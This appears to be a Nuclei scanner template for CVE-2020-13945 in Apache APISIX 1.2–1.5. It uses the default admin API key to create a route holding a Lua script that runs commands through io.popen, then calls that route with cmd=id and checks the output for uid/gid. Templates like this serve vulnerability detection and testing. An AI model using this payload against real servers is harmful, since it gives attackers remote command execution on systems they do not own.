id: CVE-2020-13945 info: name: Apache APISIX - Insufficiently Protected Credentials author: pdteam severity: medium description: Apache APISIX 1.2, 1.3, 1.4, and 1.5 is susceptible to insufficiently protected credentials. An attacker can enable the Admin API and delete the Admin API access IP restriction rules. Eventually, the default token is allowed to access APISIX management data. reference: - https://github.com/vulhub/vulhub/tree/master/apisix/CVE-2020-13945 - https://lists.apache.org/thread.html/r792feb29964067a4108f53e8579a1e9bd1c8b5b9bc95618c814faf2f%40%3Cdev.apisix.apache.org%3E - http://packetstormsecurity.com/files/166228/Apache-APISIX-Remote-Code-Execution.html - https://nvd.nist.gov/vuln/detail/CVE-2020-13945 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2020-13945 cwe-id: CWE-522 tags: intrusive,vulhub,packetstorm,cve,cve2020,apache,apisix requests: - raw: - | POST /apisix/admin/routes HTTP/1.1 Host: {{Hostname}} X-API-KEY: edd1c9f034335f136f87ad84b625c8f1 Content-Type: application/json { "uri":"/{{randstr}}", "script":"local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close() \n end \nreturn _M", "upstream":{ "type":"roundrobin", "nodes":{ "interact.sh:80":1 } } } - | GET /{{randstr}}?cmd=id HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word words: - '"action":"create"' - '"script":' - '"node":' condition: and - type: status status: - 201 extractors: - type: regex regex: - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" # Enhanced by mp on 2022/10/06